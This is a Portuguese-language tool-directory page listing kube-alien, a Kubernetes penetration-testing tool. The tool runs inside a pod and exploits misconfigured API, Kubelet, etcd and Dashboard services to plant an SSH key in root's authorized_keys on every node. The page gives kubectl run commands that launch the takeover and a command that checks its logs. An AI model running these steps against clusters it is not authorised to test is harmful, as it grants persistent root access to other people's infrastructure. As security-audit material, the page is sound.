Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
kube-alien — Ferramenta automatizada de teste de penetração em clusters Kubernetes que explora configurações incorretas na API, Kubelet, etcd e Dashboard para realizar a tomada do nó por meio de injeção de chave SSH a partir de um pod. | Kitploit
Ferramentas/GitHubGitHub/nixwizard/kube-alien
Segurança de ContêineresExploraçãoTestes de PenetraçãoSegurança na NuvemConfiguração Incorreta
GitHubnixwizard/kube-alien

kube-alien

Ferramenta automatizada de teste de penetração em clusters Kubernetes que explora configurações incorretas na API, Kubelet, etcd e Dashboard para realizar a tomada do nó por meio de injeção de chave SSH a partir de um pod.

Ver Repositório
252há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Kube-alien

Esta ferramenta lança um ataque em um cluster k8s a partir de dentro. Isso significa que você já precisa ter acesso com permissão para implantar pods em um cluster para executá-la. Após executar o pod kube-alien, ele tenta assumir o controle dos nós do cluster adicionando sua chave pública ao arquivo /root/.ssh/authorized_keys do nó, usando esta imagem https://github.com/nixwizard/dockercloud-authorizedkeys (pode ser ajustada usando o parâmetro ADD_AUTHKEYS_IMAGE em config.py) bifurcada de docker/dockercloud-authorizedkeys. O ataque tem sucesso se houver uma má configuração em um dos componentes do cluster, seguindo os seguintes vetores:

  • Kubernetes API
  • Kubelet service
  • Etcd service
  • Kubernetes-Dashboard

Qual é o propósito desta ferramenta?

  • Ao fazer uma auditoria de segurança de um cluster k8s, é possível avaliar rapidamente sua postura de segurança.
  • Demonstração prática da exploração dos vetores de ataque mencionados.

Como um cluster k8s pode ser atacado por dentro em uma situação real?

  • Vulnerabilidade RCE ou SSRF em um aplicativo que está sendo executado em um dos pods do seu cluster.

Uso

A imagem Kube-alien deve ser enviada para o seu dockerhub (ou outro registro) antes de usar esta ferramenta.

root@kitploit:~
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

A variável de ambiente AUTHORIZED_KEYS deve ser definida com o valor da sua chave pública SSH; em caso de sucesso, a chave pública será adicionada ao arquivo authorized_keys do root de todos os nós.

root@kitploit:~
kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

ou você pode usar minha imagem para teste rápido:

root@kitploit:~
kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

Verifique os logs do pod Kube-alien para ver se o ataque foi bem-sucedido:

root@kitploit:~
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

Os seguintes recursos me ajudaram muito na criação desta ferramenta

  • https://www.youtube.com/watch?v=vTgQLzeBfRU
  • https://www.youtube.com/watch?v=dxKpCO2dAy8 (e outros posts incríveis sobre superfície de ataque do kubernetes em https://raesene.github.io)
  • https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
Baixar ferramenta